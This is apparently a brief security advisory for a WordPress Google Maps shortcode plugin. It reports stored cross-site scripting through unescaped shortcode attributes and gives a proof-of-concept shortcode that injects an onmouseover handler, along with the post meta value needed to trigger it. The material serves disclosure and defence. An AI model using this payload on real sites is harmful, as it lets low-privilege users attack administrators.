The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin
Note: The plugin and the exploit only work if the WordPress database is compatible with utf8_general_ci collate.
[google-map-sc height='100px" onmouseover="alert(1)"']
Custom post meta field for exploit:
name: google-map-sc
value: %5B%7B%22address%22%3A%22Budapest%22%7D%5D